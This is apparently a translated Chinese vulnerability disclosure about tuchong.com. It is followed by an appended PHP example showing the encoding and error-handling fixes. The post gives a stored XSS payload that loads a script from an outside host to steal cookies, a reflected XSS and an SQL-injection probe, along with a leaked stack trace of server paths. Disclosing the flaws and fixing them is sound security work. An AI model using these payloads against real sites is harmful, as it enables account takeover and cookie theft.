

Tuchong (tuchong.com) stored XSS can steal cookies - Website Security - 自学ph

The impact is big: once you have the cookies you have the account plus the MD5 password, and then......

Details:

http://tuchong.com/settings/ After registering, configure it here:

Insert in the tag field: a><script/src=//tmxk.org>;<!--<a

Save. It fires on the personal homepage, oh \(^o^)/~ http://tuchong.com/272288/

This...... I tested cookie theft myself and the impact is big - -

There is also a reflected XSS that hits everything: tuchong.com, so every sub-site xxxxx.tuchong.com/?view=list has an XSS vulnerability.

There is a pile of other reflected XSS as well. I hope tuchong can fix them: escape what should be escaped, encode what should be encoded, filter what should be filtered...

The Zend configuration is not set up properly either; there are many path disclosures. Google site:tuchong.com php, or take a random example: www.2cto.com

Registration: <input type="text" required="" id="regEmail" name="user_email">

I changed user_email to [0x7c or '1'='1'#]

{"result":"ERROR","message":"SQLSTATE[HY093]: Invalid parameter number: no parameters were bound","code":"HY093","trace":[
{"file":"\/srv\/http\/tuchong\/library\/Jezo\/Db\/Adapter.php","line":945,"function":"execute","class":"PDOStatement","type":"->","args":[[]]},
{"file":"\/srv\/http\/tuchong\/library\/Jezo\/Db\/TableSelect.php","line":155,"function":"query","class":"Jezo_Db_Adapter","type":"->","args":[{}]},
{"file":"\/srv\/http\/tuchong\/application\/api\/controllers\/AccountController.php","line":297,"function":"fetchRow","class":"Jezo_Db_TableSelect","type":"->","args":[]},
{"file":"\/srv\/http\/tuchong\/library\/Zend\/Controller\/Action.php","line":513,"function":"registerAction","class":"AccountController","type":"->","args":[]},
{"file":"\/srv\/http\/tuchong\/library\/Zend\/Controller\/Dispatcher\/Standard.php","line":295,"function":"dispatch","class":"Zend_Controller_Action","type":"->","args":["registerAction"]},
{"file":"\/srv\/http\/tuchong\/library\/Zend\/Controller\/Front.php","line":954,"function":"dispatch","class":"Zend_Controller_Dispatcher_Standard","type":"->","args":[{},{"headersSentThrowsException":true}]},
{"file":"\/srv\/http\/tuchong\/library\/Zend\/Application\/Bootstrap\/Bootstrap.php","line":97,"function":"dispatch","class":"Zend_Controller_Front","type":"->","args":[]},
{"file":"\/srv\/http\/tuchong\/library\/Zend\/Application.php","line":366,"function":"run","class":"Zend_Application_Bootstrap_Bootstrap","type":"->","args":[]},
{"file":"\/srv\/http\/tuchong\/public\/api.php","line":38,"function":"run","class":"Zend_Application","type":"->","args":[]}]}

The others - -|| I won't go into.....

Fix: escape what should be escaped, encode what should be encoded, filter what should be filtered... configure Zend properly.

Author: _Evil
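The two fixes the report asks for, output encoding for the tag field and a non-leaking API error path, as an added example. This is not tuchong.com's code (its source is not on this page); the template shape, the function names and the simulated registration error are assumptions, while the payload is the one the author inserted.

```php
<?php
// Added example, not tuchong.com's source: the template shape, the function
// names and the API handler below are assumptions used to illustrate the fix.

// The stored-XSS payload from the report, exactly as the author inserted it
// into the tag field.
const PAYLOAD = 'a><script/src=//tmxk.org>;<!--<a';

// Vulnerable: the user-supplied tag is concatenated straight into HTML, so the
// payload's "a>" ends the surrounding text, "<script/src=...>" loads an
// attacker script and "<!--" comments out whatever follows.
function renderTagVulnerable(string $tag): string
{
    return '<a href="/tags/' . $tag . '">' . $tag . '</a>';
}

// Hardened: encode for the context the value lands in. htmlspecialchars with
// ENT_QUOTES covers the text node and a double- or single-quoted attribute;
// the path segment of the URL gets percent-encoding instead.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderTagSafe(string $tag): string
{
    return '<a href="/tags/' . rawurlencode($tag) . '">' . h($tag) . '</a>';
}

// Hardened API error path: log the exception server-side and return a generic
// message. Compare with the HY093 response quoted above, which sent absolute
// paths, class names and line numbers to the client.
function apiFailure(Throwable $e): string
{
    error_log(get_class($e) . ': ' . $e->getMessage() . PHP_EOL . $e->getTraceAsString());
    return json_encode(['result' => 'ERROR', 'message' => 'Request failed']);
}

// True when the rendered HTML still contains an unencoded "<script".
function containsRawScript(string $html): bool
{
    return stripos($html, '<script') !== false;
}

$vuln = renderTagVulnerable(PAYLOAD);
$safe = renderTagSafe(PAYLOAD);

echo "vulnerable: $vuln", PHP_EOL;
echo "hardened:   $safe", PHP_EOL;

// Simulated registration endpoint catching a database error (constructed
// message, mirroring the SQLSTATE text from the report).
try {
    throw new PDOException('SQLSTATE[HY093]: Invalid parameter number: no parameters were bound');
} catch (Throwable $e) {
    echo apiFailure($e), PHP_EOL;
}

if (!containsRawScript($vuln) || containsRawScript($safe)) {
    throw new RuntimeException('unexpected rendering result');
}
```

Run with `php example.php`: the vulnerable line still contains `<script/src=//tmxk.org>`, the hardened line contains only `&lt;script` and a percent-encoded href, and the error response carries no file paths. For the path disclosure side, a Zend Framework 1 application.ini normally keeps `phpSettings.display_errors = 0` and `resources.frontController.params.displayExceptions = 0` in its `[production]` section; whether tuchong's deployment set those is not visible on this page.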

